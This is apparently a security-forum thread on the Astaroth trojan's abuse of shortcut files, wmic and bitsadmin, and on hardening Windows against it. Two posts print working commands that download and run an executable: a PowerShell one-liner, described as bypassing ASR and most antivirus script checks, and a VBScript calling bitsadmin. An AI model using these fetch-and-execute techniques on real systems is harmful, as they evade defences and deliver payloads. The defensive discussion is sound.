This Trojan exploits antivirus software to steal your data

AtlBo

Level 28
Verified
Top Poster
Content Creator
Well-known
Dec 29, 2014
1,716
Comodo or NVT OSA should block this but not sure about when with Comodo. Couple of questions:

-Anyone know what Comodo would see this action to be when the .lnk is run? I suppose the browser?
-How is the dropped file activated...is it via instructions in the .lnk file?

I guess am never going to get away from Comodo, not that I'm really trying. Just wish Viruscope would identify more activities as potentially malicious...like a net facing file (especially a downloaded one) that wants to download, etc. Someday...:emoji_pray:

I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. Seems to harm performance for me, but I don't like having to install sandboxie. No experience with the setup, and I think I would get lost...
 

notabot

Level 15
Verified
Oct 31, 2018
703
It is sufficient for this malware and some more. But WD ASR can be possibly bypassed on Windows Home and Pro by PowerShell, for example:
Code:
powershell Import-Module bitstransfer;Start-BitsTransfer 'https://kcsoftwares.com/files/sumo_lite.exe' $home\Downloads\sumo_lite.exe;$filepath = $HOME + '\Downloads\sumo_lite.exe'; Invoke-WmiMethod -class win32_Process -Name Create -ArgumentList $filepath
Create the shortcut with this command and click the shortcut. It should download and execute the known & legal & useful SUMo installer. This should also bypass most AVs (anti-script modules).
The SUMo webpage:

This will be blocked by SRP though. ASR on its own is not sufficient for sure but I wonder if blacklisting sponsors is really required or the native security mechanisms combined are sufficient.

Again, nothing wrong with blacklisting some sponsors whose behavior is clear and do not affect the system but the task of compiling a policy for all sponsors is complex and mistakes may break the system. If eg ASR+SRP (+others?) suffice then it may make sense to stop there.
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,592
I think the most effective thing would be a sandbox..... Astaroth can't help it.
or if it can?:unsure:
It cannot infect the system, when the user has run the shortcut in the sandbox. But, it can gather and send information to the remote server (except the sandbox with blocked Internet connection). Furthermore, the malware works invisibly, so the user may think that it cannot run in the sandbox, and may be fooled to run it outside the sandbox.
I am not sure if Comodo Firewall Sandbox can stop injecting the unsafe DLL by the legal Windows or Avast tools.
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,592
If wmic.exe and bitsadmin.exe is blocked from executing with a HIPS rule, will there be any problems with launching legitimate applications?
Those executables are hardly used by the user applications and Windows system. There should not be any problems with blocking them.
 

shmu26

Level 85
Verified
Honorary Member
Top Poster
Content Creator
Well-known
Jul 3, 2015
8,153
Sometimes bitsadmin is needed for windows updates. It has a warning sign in syshardener. I would not want to block it through firewall, I prefer to block it through Hard_Configurator, so it will still be able to function when the system needs it.

But if you have a good default/deny that starts working quickly after reboot, then the payload will anyways be blocked,. Even if bitsadmin downloaded it, it won't be able to run. Hard_Configurator is good for that, too.

Lockdown used to always say that blocking bitsadmin through firewall won't work, because at the firewall level, Windows sees it as SYSTEM, not as bitsadmin. So it will fly right by your firewall rule.
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,592
.. I wonder if blacklisting sponsors is really required or the native security mechanisms combined are sufficient.

Again, nothing wrong with blacklisting some sponsors whose behavior is clear and do not affect the system but the task of compiling a policy for all sponsors is complex and mistakes may break the system. If eg ASR+SRP (+others?) suffice then it may make sense to stop there.
As I said, you can block shortcuts via SRP, but doing this in the proper way, will require a good knowledge of SRP. Most people, allow shortcuts in SRP.

Blocking many sponsors as administrator can be dangerous.
But, SRP can block them as standard user
 

bribon77

Level 35
Verified
Top Poster
Well-known
Jul 6, 2017
2,392
I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. Seems to harm performance for me, but I don't like having to install sandboxie. No experience with the setup, and I think I would get lost...
1: Comodo Sanbox. no need to use it for everything can be used punctually for mail and suspicious pages.
2: As for Sandboxie, the free version is very easy is just configure delete on exit and ready.:sneaky:
 

Moonhorse

Level 38
Verified
Top Poster
Content Creator
Well-known
May 29, 2018
2,728
Comodo or NVT OSA should block this but not sure about when with Comodo. Couple of questions:

-Anyone know what Comodo would see this action to be when the .lnk is run? I suppose the browser?
-How is the dropped file activated...is it via instructions in the .lnk file?

I guess am never going to get away from Comodo, not that I'm really trying. Just wish Viruscope would identify more activities as potentially malicious...like a net facing file (especially a downloaded one) that wants to download, etc. Someday...:emoji_pray:

I like the sandbox idea, but I haven't been using the Comodo sandbox for the browser so far. Seems to harm performance for me, but I don't like having to install sandboxie. No experience with the setup, and I think I would get lost...
I never ran myself comodo sandbox with cs settings, since it runs browser as rejected without internet connection lol

Sandboxie free is easy to use, doesnt slow anything down. I used it with basilisk browser and was working pretty well. Have you completely gotten rid of qihoo 360 ? I liked qihoo sandbox when i tried it
 

notabot

Level 15
Verified
Oct 31, 2018
703
As I said, you can block shortcuts via SRP, but doing this in the proper way, will require a good knowledge of SRP. Most people, allow shortcuts in SRP.

Blocking many sponsors as administrator can be dangerous.
But, SRP can block them as standard user

No need to block it for admin a user should use SUA for day to day work, shortcut SRP is probably needed (see below for a weaker alternative)

Assuming only administrative tasks happen as admin and no bypass for the native mechanisms it becomes a question whether the below leaves anything open

UAC+ASR+SRP(incl shortcuts)+Powershell constrained mode

I don’t think it does but ofc it needs a thorough analysis of the attack vectors to confirm or reject the statement

A weaken version of this is

UAC+ASR+SRP(without shortcuts)+Powershell constrained & only signed+block only Powershell in Windows Firewall

This does block one lolbin but just a single one, Powershell, for everything else it relies on UAC+ASR+SRP

Maybe the weaker version suffices as well

Edit: weaker version does not suffice as is but perhaps it’s worth checking what is missing (eg would adding DEP suffice?)
 
Last edited:
F

ForgottenSeer 69673

This malware does not run any installed application, but directly execute wmic.exe when the user clicked on the shortcut.
This is how I cover wmic.
208570
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,592
Sometimes bitsadmin is needed for windows updates. It has a warning sign in syshardener. I would not want to block it through firewall, I prefer to block it through Hard_Configurator, so it will still be able to function when the system needs it.

But if you have a good default/deny that starts working quickly after reboot, then the payload will anyways be blocked,. Even if bitsadmin downloaded it, it won't be able to run. Hard_Configurator is good for that, too.

Lockdown used to always say that blocking bitsadmin through firewall won't work, because at the firewall level, Windows sees it as SYSTEM, not as bitsadmin. So it will fly right by your firewall rule.
Windows Updates can use Background Intelligent Transfer Service (BITS) to download updates, but does not use bitsadmin.exe for that. BITS cannot be blocked by Windows Firewall and SRP, but bitsadmin.exe can be blocked by SRP, because the malware runs it with standard user rights. The download initiated by bitsadmin.exe cannot be blocked by Windows Firewall, because it is not bitsadmin.exe that downloads the file, but Background Intelligent Transfer Service.
You can check it by yourself by running the below script and look at ProcessExplorer to see the integrity level of bitsadmin.exe:
Code:
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("bitsadmin.exe /transfer 'JobName' https://kcsoftwares.com/files/sumo_lite.exe C:\Users\Admin\Downloads\sumo_lite.exe")
WScript.Sleep(10000)

The script can be also used to confirm that the download initiated by bitsadmin.exe, cannot be blocked by the Windows Firewall rule, like @smu26 said.(y):giggle:


Post Edited.
I confirmed by myself that the download initiated by bitsadmin.exe cannot be stopped by the firewall rule for bitsadmin.exe . Before, that I was wrongly thought that it can be stopped by the firewall, because it runs with standard user rights. But, in fact, the download is done by something else (Background Intelligent Transfer Service).
 
Last edited:

Wraith

Level 13
Verified
Top Poster
Well-known
Aug 15, 2018
634
NVT SysHardener, NVT OSA, and H_C will block this malware.
Sorry for the dumb question. But can you please explain to me how they will stop the malware? Does syshardener disable wmic/bitsadmin? And does OSA monitor wmic and bitsadmin? H_C at default-deny should stop the execution of the malicious.ink shortcut file, right?
 

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top